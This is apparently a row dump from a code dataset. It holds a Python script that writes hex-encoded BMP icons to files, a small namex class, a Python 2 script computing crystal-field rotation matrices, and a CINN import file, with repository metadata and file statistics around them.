"BSD-3-Clause"
] | null | null | null |
ByteToImage/src/bytetoimage.py
|
p--q/ByteToImage
|
79139718ecbb499a72340155ff5be3b9ffce5c5b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import binascii
import os
import imghdr
def main():
fd = "images" # 画像フォルダ
if not os.path.exists(fd):
os.mkdir(fd)
os.chdir(fd)
#画像の十六進法のバイト列の辞書。キー:画像名、値:十六進数バイト列
dic = {"image1ImageSmall":b"424df80000000000000076000000280000001000000010000000010004000000000000000000120b0000120b000000000000000000000000ff0000ffff0000ff0000ffff0000ff000000ff00ff00ffffff00c0c0c0008080800000000000000080000080800000800000808000008000000080008000cccccccccccccccc2c266b181b666c2c5cc66b818b6665c555566b181b66655555566b818b66655555566b181b6665555a8666bbb6668a55a0a866666668a0a5000a8666668a000a6000a86668a000a556000a868a000a55556000a8a000a5555556000a000a55555555600000a55555555556000a55555555555560a55555550000",
"image1ImageBig":b"424d180200000000000076000000280000001a0000001a000000010004000000000000000000120b0000120b000000000000000000000000ff0000ffff0000ff0000ffff0000ff000000ff00ff00ffffff00c0c0c000808080000000000000008000008080000080000080800000800000008000800055555555555555555555555555999990cccccccccccccccccccccccccc9055552cc2c6666b18181b6666c2cc2c99ccccc2ccc6666b81818b66668c2cc5902cc25c2586666b18181b66668ccc5590c2cc555586666b81818b6666855555995c25555586666b18181b6666855555995555555586666b81818b6666855555005555555586666b18181b666685555590555555a5866666b181b6666685a5550955555a0a8666666bbb6666668a0a559955a5a000a866666666666668a000a5995a0a00000a8666666666668a00000a90a000600000a86666666668a00000a50900005600000a866666668a00000a5599600055600000a8666668a00000a555095600555600000a86668a00000a55559955605555600000a868a00000a5555599555655555600000a8a00000a555555005555555555600000a00000a555555590555555555556000000000a555555550955555555555560000000a555555555995555555555555600000a555555555590555555555555556000a555555555550055555555555555560a555555555555905555555555555555555555555555559055550000",
"image1ImageSmallHC":b"424df60000000000000076000000280000001000000010000000010004000000000080000000120b0000120b000000000000000000000000ff0000ffff0000ff0000ffff0000ff000000ff00ff00ffffff00c0c0c00080808000000000000000800000808000008000008080000080000000800080002222222222222222222996969699922252299669669995255559969696999555555996696699955555599696969995555969996669996955969699999996969566696999996966699666969996966695596669696966695555966696966695555559666966695555555596666695555555555966695555555555559695555555",
"image2ImageSmall":b"424d36030000000000003600000028000000100000001000000001001800000000000003000000000000000000000000000000000000ff00ffff00ffff00ffff00fff0eeee6c5f602512133c2b2c2b1719594a4bdcd8d8ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff5443453a2525d0c5bdffffffffffffffffffe6e7e8493c3c5e514eb7b1b0ff00ffff00ffff00ffff00ffff00ff5c4a4dc0bbbcfffffffbeadee7bca8e7bcabdfb4a2f1c4b0fffffad0d0cd584a4dc5bbb8ff00ffff00ffff00ffddd9d9514449ffffffd49578b7511eb5582ed29d85ce8b6db54513ba5f32eeccb8fffffffffffbd3cfcfff00ffff00ffd9cdc5e0d9dadc9270ba4613bf511dc99076edeae7f2dcced27b54bc4811ba5724d3ad96ffffff402d30ff00ffefeae6e9e0daeabba4ba4308cb5b28cb5f2ecc7046d99979db8f66ce6635cc5d2dbf4e1ab85225ffeee5726361b1aaaad8cbc2ffffffbf4911c65b21cf6532cc5d2bcc764edbae97dfa284ce6a3bcc5b2bcc602ebb4310d28259ffffff332124d7cbc2fffffebb2600d0703bcc612ecb5b2bca7a56dfd3cdf5f4f1e1a686cd6333ce622dc95e2abe3901ffffff2b1a1dd8cdc4ffffffbe2f00d36f40cb602dcb5928c95a29ce8666e9ded7f1dcd2d77e56cd612acc6530c43a00ffffff312125d5c8beffffffcf3f00d66e3dcc632fc95d2ccb5522c44f19cf8c6becd4ccde9b81d06435d05b26c65619ffffff251317d9cdc5fefffff09361e87437da794ad29a7edfa68ad56f3bd5835bedd5cbe3b399d36939db6126e9b395ffffff3f3033f5f2f0ded6d1fff1e4f9a36ff28b52e3b39beeefedf3e5d9f2e7def4f0eaeba87ee66d2fee9e72fffffcb28d89c7c6c6ff00ffcbb6aaffffffffebdcfec08ff6b584edcebbeddaddf3dfdff5cab3f79c66fbaa7dfce8dcffffffb99e9bff00ffff00ffdccbc3e0d6cef2f2f2fffffcfff2d1fadca3f6cf91fac588fdc68bffe4c5fffefaffffffe2d4c8f2efeeff00ffff00ffff00fff0ebe6dfd0c9dbcac2f8f7f4fffffffffffffffffffdf8f2e3d9d1cfbfb4ebe3ddff00ffff00ffff00ffff00ffff00ffff00ffff00fffafaf9e1d6ced5c2b9d9c9c2d5c6beddcfc8f4f0efff00ffff00ffff00ffff00ffff00ff",
"image2ImageBig":b"424d560800000000000036000000280000001a0000001a00000001001800000000002008000000000000000000000000000000000000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff524142524142524142524142524142524142524142524142ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ff524142524142bda69cd6c7bddecfc6ded7d6e7dfd6e7d7cebdbebdb59694524142524142ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ff524142fffffffffffffffffffffffffffffffffffffffffff7f7f7ffffffffffffffefefbdb6ad524142524142ff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ff524142ffffffffffffffffffefefefdedfdebdb6adc6a694d6a68cdebeade7d7ceefefeff7f7f7ffffffefe7deefe7de524142ff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffbda69cffffffffffffffffffefe7ded6a68cbd6139bd5929ce6942c6795abd5929bd5931ce8663debeadefefeffffffffff7f7efe7de524142ff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffbda69cffffffffffffe7cfc6ce7142bd5929bd5929bd6139d6c7bdffffffd69e84bd5929bd5929bd5929d69e7befefefffffffffefef524142ff00ffff00ffff00ffff00ff0000ff00ffff00ffdecfc6ffffffffffffe7cfc6c66139bd5929c66131ce6131bd7152dedfdeffffffe7c7bdce6131ce6131bd5929bd5929ce8e6befefefffffffdecfc6524142ff00ffff00ffff00ff0000ff00ffff00ffdecfc6ffffffefe7e7ce7142c66131ce6131ce6131ce6131c66131d6a68cefcfbdd68652ce6131ce6131ce6131c66131bd5929d6a68cffffffffffff524142ff00ffff00ffff00ff0000ff00ffdecfc6fff7f7ffffffdeae94bd5929ce6131ce6931ce6131ce6131ce6131ce6939d67142ce6131ce6131ce6131ce6131ce6131bd5929c66139f7dfd6ffffffdecfc6524142ff00ffff00ff0000ff00ffdecfc6fffffff7efefd6714ac66131ce6931ce6931ce6131ce6131c66939debeadffefe7de966bc66131ce6131ce6131ce6131ce6131bd5929deae94ffffffffefe7524142ff00ffff00ff0000ff00ffdecfc6ffffffefd7cece6131ce6931ce6931ce6131ce6131ce6131c66939d6d7d6ffffffdeb69cce6131ce6131ce6131ce6131ce613
1bd5929ce8e63f7f7f7ffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffefc7adce6131ce6939ce6931ce6131ce6131ce6131ce6131c6a694f7f7f7fff7efd68e63ce6131ce6131ce6131ce6931ce6131d6714af7efefffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffefc7adce6131d66939ce6931ce6131ce6131ce6131ce6131c66139debeadfffffffff7efd68e63ce6131ce6931ce6931ce6131d6714af7efefffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffffcfb5d67139d67142d66939ce6131ce6131ce6131ce6131ce6131c66939d6c7bdffffffffefefd6714ace6131d66939ce6931d68652fff7f7ffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffffe7dee7794ade7142d67139ce6931ce6131ce6131ce6131ce6131ce6131ce7142f7efefffffffe7ae94ce6131d66939d66939d69673ffffffffffff524142ff00ffff00ff0000ff00ffdecfc6ffffffffffffefa67bef8652de7142d6714adebeadefdfcede9e7bce6131ce6131ce6131f7dfd6ffffffefc7add66939de7142d66939efc7b5ffffffffefef524142ff00ffff00ff0000ff00ffdecfc6f7f7f7ffffffffdfc6f7965af78e5ade794acecfceffffffffefe7d68652ce6131d69e84ffffffffffffdeae94d67139de7142ef9663fff7f7ffffffd6c7bd524142ff00ffff00ff0000ff00ffff00ffdecfc6fffffffffffff7c7adff9e6bf7965ad69e84efefeffffffffffff7ffefdeffffffffffffefe7e7ef9663e7864aef8652f7dfceffffffffffffb59694ff00ffff00ffff00ff0000ff00ffff00ffdecfc6f7f7efffffffffffffffd7adffb684ffa673efb69cdedfdeefefefefefefefefefefe7deefae8cf7965aff9663ffcfb5ffffffffffffdecfc6b59694ff00ffff00ffff00ff0000ff00ffff00ffff00ffdecfc6ffffffffffffffffffffefd6ffdfadffc794ffc794efb69cefb69cffbe9cffb684ffae7bffb68cffe7d6fffffffffffff7efe7bdb6adff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffdecfc6fffffffffffffffffffffff7ffffe7ffffd6ffefb5ffefb5ffdfadffdfadffefd6fffff7fffffffffffffff7efdecfc6ff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffdecfc6fff7efffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdecfc6decfc6ff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffdecfc6decfc6fff7effffffffffffffffffffffffffffffffffffffffff7decfc6decfc6ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff0
0ffff00ffff00ffdecfc6decfc6decfc6decfc6decfc6decfc6decfc6decfc6ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff0000",
"image2ImageSmallHC":b"424d36030000000000003600000028000000100000001000000001001800000000000003000000000000000000000000000000000000ff00ffff00ffff00ffff00fff0eeee6c5f602512133c2b2c2b1719594a4bdcd8d8ff00ffff00ffff00ffff00ffff00ffff00ffff00ffff00ff5443453a2525d0c5bdffffffffffffffffffe6e7e8493c3c5e514eb7b1b0ff00ffff00ffff00ffff00ffff00ff5c4a4dc0bbbcffffffffffffffffffffffffffffffffffffffffffd0d0cd584a4dc5bbb8ff00ffff00ffff00ffddd9d9514449ffffffffffffffffffffffff251317251317fffffffffffffffffffffffffffffbd3cfcfff00ffff00ffd9cdc5e0d9daffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff402d30ff00ffefeae6e9e0daffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffffffffff726361b1aaaad8cbc2ffffffffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffffffffffffffff332124d7cbc2fffffeffffffffffffffffffffffffffffff251317251317000000ffffffffffffffffffffffffffffff2b1a1dd8cdc4ffffffffffffffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffffffffff312125d5c8beffffffffffffffffffffffffffffffffffffffffffffffff251317251317ffffffffffffffffffffffff251317d9cdc5feffffffffffffffffffffff000000000000ffffffffffff251317251317ffffffffffffffffffffffff3f3033f5f2f0ded6d1ffffffffffffffffff000000251317251317251317251317000000ffffffffffffffffffb28d89c7c6c6ff00ffcbb6aaffffffffffffffffffffffff000000251317251317000000ffffffffffffffffffffffffb99e9bff00ffff00ffdccbc3e0d6cef2f2f2fffffffffffffffffffffffffffffffffffffffffffffefaffffffe2d4c8f2efeeff00ffff00ffff00fff0ebe6dfd0c9dbcac2f8f7f4fffffffffffffffffffdf8f2e3d9d1cfbfb4ebe3ddff00ffff00ffff00ffff00ffff00ffff00ffff00fffafaf9e1d6ced5c2b9d9c9c2d5c6beddcfc8f4f0efff00ffff00ffff00ffff00ffff00ff"
}
for name,hexdata in dic.items():
data = binascii.a2b_hex(hexdata) # 十六進数バイト列をバイナリに変換。
imagetype = imghdr.what(None, h=data) # 画像のタイプを判定して拡張子を取得。
if imagetype:
name += "." + imagetype
with open(name, 'wb') as fp:
fp.write(data) #
if __name__ == "__main__":
import sys
sys.exit(main())
| 372.607143
| 4,301
| 0.964919
| 93
| 10,433
| 108.150538
| 0.666667
| 0.000795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.471044
| 0.023483
| 10,433
| 28
| 4,302
| 372.607143
| 0.516196
| 0.011119
| 0
| 0
| 0
| 0
| 0.943647
| 0.932687
| 0
| 1
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.16
| 0
| 0.2
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e06444a57013ea8f9cd17fc6391a95143d0008d1
| 146
|
py
|
Python
|
api/namex/resources/auto_analyse/paths/bc_name_analysis/issues/contains_words_to_avoid.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | 1
|
2020-02-21T05:49:14.000Z
|
2020-02-21T05:49:14.000Z
|
api/namex/resources/auto_analyse/paths/bc_name_analysis/issues/contains_words_to_avoid.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
api/namex/resources/auto_analyse/paths/bc_name_analysis/issues/contains_words_to_avoid.py
|
sumesh-aot/namex
|
53e11aed5ea550b71b7b983f1b57b65db5a06766
|
[
"Apache-2.0"
] | null | null | null |
from namex.resources.auto_analyse.issues import ContainsWordsToAvoidIssue
class BcContainsWordsToAvoidIssue(ContainsWordsToAvoidIssue):
pass
| 29.2
| 73
| 0.876712
| 12
| 146
| 10.583333
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082192
| 146
| 5
| 74
| 29.2
| 0.947761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
0ef2160b01cfb593942a01592777d46ec9b75696
| 13,038
|
py
|
Python
|
src/putils/findDiagonal/find5dRotation2.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 7
|
2018-04-03T06:37:42.000Z
|
2021-11-08T11:44:06.000Z
|
src/putils/findDiagonal/find5dRotation2.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | null | null | null |
src/putils/findDiagonal/find5dRotation2.py
|
chanul13/EDMFTF
|
967d85d898924991b31861b4e1f45129e3eff180
|
[
"BSD-3-Clause"
] | 3
|
2016-10-27T20:23:34.000Z
|
2019-12-13T13:54:11.000Z
|
from scipy import *
from scipy import linalg
import sys
import copy
def mprint(Us):
for i in range(shape(Us)[0]):
for j in range(shape(Us)[1]):
print "%11.8f %11.8f " % (real(Us[i,j]), imag(Us[i,j])),
print
def MakeOrthogonal(a, b, ii):
a -= (a[ii]/b[ii])*b
a *= 1/sqrt(dot(a,a.conj()))
b -= dot(b,a.conj())*a
b *= 1/sqrt(dot(b,b.conj()))
return (a,b)
def StringToMatrix(cfstr):
mm=[]
for line in cfstr.split('\n'):
line = line.strip()
if line:
data = array(map(float,line.split()))
mm.append( data[0::2]+data[1::2]*1j )
mm=matrix(mm)
return mm
def RealPhase(vec):
for j in range(len(vec)):
v = vec[j]
#print 'checkin j'
imax = 0
vmax = abs(v[imax])
for i in range(len(v)):
if abs(v[i])>vmax:
vmax=abs(v[i])
imax = i
#print 'imax', imax, v[imax]
vec[j,:] = array(v)*abs(v[imax])/v[imax]
return vec
def to_normalize(a):
return 1./sqrt(abs(dot(conj(a), a)))
def swap(a,b):
an = copy.deepcopy(a)
bn = copy.deepcopy(b)
return (bn,an)
strHc1="""
-2.00018980 0.00000000 0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 0.00000000 0.00000000 0.17125395 0.18220260
0.00000000 0.00000000 -2.00018979 0.00000000 0.00000000 0.00000000 -0.00004096 0.24670234 0.17125395 -0.18220260 0.00000000 0.00000000
-0.00004096 0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18221011 0.17125654
0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000
0.00000000 0.00000000 0.17125395 0.18220260 0.00000000 0.00000000 -0.18221011 0.17125654 -1.65479986 0.00000000 0.00000000 0.00000000
0.17125395 -0.18220260 0.00000000 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000 0.00000000 0.00000000 -1.65479986 0.00000000
"""
strHc2="""
-2.00018980 0.00000000 0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 0.00000000 0.00000000 0.17125395 0.18220260
0.00000000 0.00000000 -2.00018979 0.00000000 0.00000000 0.00000000 -0.00004096 0.24670234 0.17125395 -0.18220260 0.00000000 0.00000000
-0.00004096 0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18221011 0.17125654
0.00000000 0.00000000 -0.00004096 -0.24670234 0.00000000 0.00000000 -1.99983239 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000
0.00000000 0.00000000 0.17125395 0.18220260 0.00000000 0.00000000 -0.18221011 0.17125654 -1.65479986 0.00000000 0.00000000 0.00000000
0.17125395 -0.18220260 0.00000000 0.00000000 -0.18221011 -0.17125654 0.00000000 0.00000000 0.00000000 0.00000000 -1.65479986 0.00000000
"""
strHc3="""
-2.00016629 0.00000000 0.00000000 0.00000000 -0.00008153 -0.24670254 0.00000000 0.00000000 0.00000000 0.00000000 0.17125296 0.18219979
0.00000000 0.00000000 -2.00016991 0.00000000 0.00000000 0.00000000 -0.00008153 0.24670261 0.17125291 -0.18219987 0.00000000 0.00000000
-0.00008153 0.24670254 0.00000000 0.00000000 -1.99961597 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18220613 0.17125778
0.00000000 0.00000000 -0.00008153 -0.24670261 0.00000000 0.00000000 -1.99961959 0.00000000 -0.18220620 -0.17125773 0.00000000 0.00000000
0.00000000 0.00000000 0.17125291 0.18219987 0.00000000 0.00000000 -0.18220620 0.17125773 -1.65468685 0.00000000 0.00000000 0.00000000
0.17125296 -0.18219979 0.00000000 0.00000000 -0.18220613 -0.17125778 0.00000000 0.00000000 0.00000000 0.00000000 -1.65469210 0.00000000
"""
strHc4="""
-2.00016629 0.00000000 0.00000000 0.00000000 -0.00008153 -0.24670254 0.00000000 0.00000000 0.00000000 0.00000000 0.17125296 0.18219979
0.00000000 0.00000000 -2.00016991 0.00000000 0.00000000 0.00000000 -0.00008153 0.24670261 0.17125291 -0.18219987 0.00000000 0.00000000
-0.00008153 0.24670254 0.00000000 0.00000000 -1.99961597 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.18220613 0.17125778
0.00000000 0.00000000 -0.00008153 -0.24670261 0.00000000 0.00000000 -1.99961959 0.00000000 -0.18220620 -0.17125773 0.00000000 0.00000000
0.00000000 0.00000000 0.17125291 0.18219987 0.00000000 0.00000000 -0.18220620 0.17125773 -1.65468685 0.00000000 0.00000000 0.00000000
0.17125296 -0.18219979 0.00000000 0.00000000 -0.18220613 -0.17125778 0.00000000 0.00000000 0.00000000 0.00000000 -1.65469210 0.00000000
"""
strT2C="""
0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000
-0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 -0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
strT2Crest="""
0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 1.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000
0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.00000000 0.70710679 0.00000000
"""
# -2-1 0 1 2 -2-1 0 1 2
# [0,1,2,3,4, 5,6,7,8,9]
# [9,8,7,6,5, 4,3,2,1,0]
# time-reversal
def GiveTrans(strHc, strT2C, strT2Crest):
Hc=StringToMatrix(strHc)[:6,:6]
T2C=StringToMatrix(strT2C)
T2Crest = StringToMatrix(strT2Crest)
#print 'T2Crest='
#mprint(T2Crest)
#print
ee = linalg.eigh(Hc)
Es = ee[0]
Us = matrix(ee[1])
#print 'In Eigensystem:'
#mprint(Us.H * Hc * Us)
# Us.H * Hc * Us === diagonal
print 'Eigenvalues=', Es.tolist()
for i0 in range(0,6,2):
i2=i0+2
vects = Us[:,i0:i2]
O = transpose(conj(vects))[0:2,i0:i2]
(u_,s_,v_) = linalg.svd(O)
print 'S=', s_.tolist()
m = min(shape(u_)[1],shape(v_)[0])
R = dot(u_[:,:m],v_[:m,:])
vectn = dot(vects,R)
Us[:,i0:i2] = vectn[:,:]
#print
#mprint( vectn )
#Us = u_ * s_ * v_
#c_ = zeros((shape(u_)[0],shape(v_)[1]),dtype=complex)
#for i in range(shape(u_)[0]):
# for l in range(shape(v_)[1]):
# for j in range(shape(u_)[1]):
# c_[i,l] += u_[i,j]*s_[j]*v_[j,l]
#print 'Eigenvalues'
#print "%10.5f "*len(Es) % tuple(Es)
print 'Transformation in crystal harmonics='
mprint(Us)
print
final = Us.T*T2C
final = array(final)
final2 = RealPhase(final)
# final2[0,:] -= final2[1,:] * final2[0,5]/final2[1,5]
# final2[1,:] -= final2[0,:] * final2[1,0]/final2[0,0]
# final2[0,:] *= to_normalize(final2[0,:])
# final2[1,:] *= to_normalize(final2[1,:])
#
# final2[2,:] -= final2[3,:] * final2[2,5]/final2[3,5]
# final2[3,:] -= final2[2,:] * final2[3,0]/final2[2,0]
# final2[2,:] *= to_normalize(final2[2,:])
# final2[3,:] *= to_normalize(final2[3,:])
#
# final2[4,:] -= final2[5,:] * final2[4,5]/final2[5,5]
# final2[5,:] -= final2[4,:] * final2[5,0]/final2[4,0]
# final2[4,:] *= to_normalize(final2[4,:])
# final2[5,:] *= to_normalize(final2[5,:])
# final2[0:2,:] = swap(final2[0,:],final2[1,:])
final=copy.deepcopy(final2)
return (final, T2C, Hc, T2Crest)
def Check(final, T2C, Hc):
# the modified final transofrmation is rotated back to t2g-eg base to see how weell diagonal remains
Us_new = transpose(matrix(final)*T2C.H)
print 'Check-diagonal:'
mprint(Us_new.H * Hc * Us_new)
print 'Check unitary:'
mprint( matrix(final) * matrix(final).H )
print
def CheckDet(final, T2Crest):
totalfinal = vstack((final,T2Crest))
Det = linalg.det(totalfinal)
print 'Determinant=', Det
if abs(Det+1)<1e-3:
print 'Determinant is -1, you need to change an eigenvector, to make the rotation proper!'
return Det
(final1, T2C, Hc1, T2Crest) = GiveTrans(strHc1, strT2C, strT2Crest)
(final2, T2C, Hc2, T2Crest) = GiveTrans(strHc2, strT2C, strT2Crest)
(final3, T2C, Hc3, T2Crest) = GiveTrans(strHc3, strT2C, strT2Crest)
(final4, T2C, Hc4, T2Crest) = GiveTrans(strHc4, strT2C, strT2Crest)
print 'Rotation to input : '
mprint( final1 )
print
mprint( final2 )
print
mprint( final3 )
print
mprint( final4 )
print
print 'rest='
mprint( T2Crest )
# correcting the transformation to have higher symmetry
# there is some freedom due to degenerate eigenvalues
# first the phase factors
# final[0,:] *= 1j
# final[1,:] *= abs(final[1,8])/final[1,8]
# final[2,:] *= -1j
# cc= final[3,6]/abs(final[3,6])
# final[3,:] *= 1/cc
# final[4,:] *= -1j
# cc = final[5,6]/abs(final[5,6])
# final[5,:] *= 1/cc
# # second linear combinations
# final[2,:],final[3,:] = MakeOrthogonal(final[2,:], final[3,:], 0)
# final[4,:],final[5,:] = MakeOrthogonal(final[4,:], final[5,:], 0)
# final[0,:] *= abs(final[0,8])/final[0,8]
# final[1,:] *= 1j
# final[3,:] *= -1j
# cc= final[2,6]/abs(final[2,6])
# final[2,:] *= 1/cc
# cc= final[4,6]/abs(final[4,6])
# final[4,:] *= 1/cc
# final[5,:] *= 1j
#a = final2[0]
#b = final2[1]
#print 'a*b=', dot(conj(a),b)
#print 'a*a=', dot(conj(a),a)
#print 'b*b=', dot(conj(b),b)
#print a.tolist()
#print b.tolist()
#print a[::-1].tolist()
#c1 = (b[::-1]-a)
#c2 = (b+a[::-1])
#for i in range(len(a)):
# print "%11.8f %11.8f " % (c1[i].real,c1[i].imag),
#print
#for i in range(len(a)):
# print "%11.8f %11.8f " % (c2[i].real,c2[i].imag),
#print
#print c2/c1
# y=sqrt(1-x^2)
# a_new = x*a+y*b
# b_new = -y.c*a+x.c*b
#
# T(x*a+y*b) = (-y.c*a+x.c*b)
# T(-y.c*a+x.c*b) = x*a+y*b
#
# x.c*Ta + y.c*Tb = -y.c*a+x.c*b
# -y*Ta+x*Tb = x*a+y*b
#
# x.c*(b-Ta) = y.c*(Tb+a)
# x*(Tb-a) = y*(b+Ta)
#
# y*(Tb+a) = x*(b-Ta)
# x*(Tb-a) = y*(b+Ta)
#
# x/y = (Tb+a)/(b-Ta)
# (x/y)**2 + 1 = 1/y**2
#
# y = sqrt(1/(1+(x/y)**2))
| 43.605351
| 241
| 0.582605
| 1,954
| 13,038
| 3.870522
| 0.103889
| 0.416501
| 0.431046
| 0.633082
| 0.608621
| 0.595266
| 0.589978
| 0.588126
| 0.588126
| 0.588126
| 0
| 0.494906
| 0.26975
| 13,038
| 298
| 242
| 43.751678
| 0.299443
| 0.200107
| 0
| 0.260563
| 0
| 0.239437
| 0.702546
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.028169
| null | null | 0.183099
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
162b6f3a446fe589a90fe785c7ee4b1c7564b21b
| 73
|
py
|
Python
|
python/cinn/optim.py
|
edithgogo/CINN
|
bed13f4752d80d01a3e1d96a4cc4f5aa56b1e292
|
[
"Apache-2.0"
] | 1
|
2019-10-23T09:16:23.000Z
|
2019-10-23T09:16:23.000Z
|
python/cinn/optim.py
|
edithgogo/CINN
|
bed13f4752d80d01a3e1d96a4cc4f5aa56b1e292
|
[
"Apache-2.0"
] | null | null | null |
python/cinn/optim.py
|
edithgogo/CINN
|
bed13f4752d80d01a3e1d96a4cc4f5aa56b1e292
|
[
"Apache-2.0"
] | null | null | null |
from .core_api.optim import simplify
from .core_api.optim import ir_copy
| 24.333333
| 36
| 0.835616
| 13
| 73
| 4.461538
| 0.615385
| 0.275862
| 0.37931
| 0.551724
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 37
| 36.5
| 0.892308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
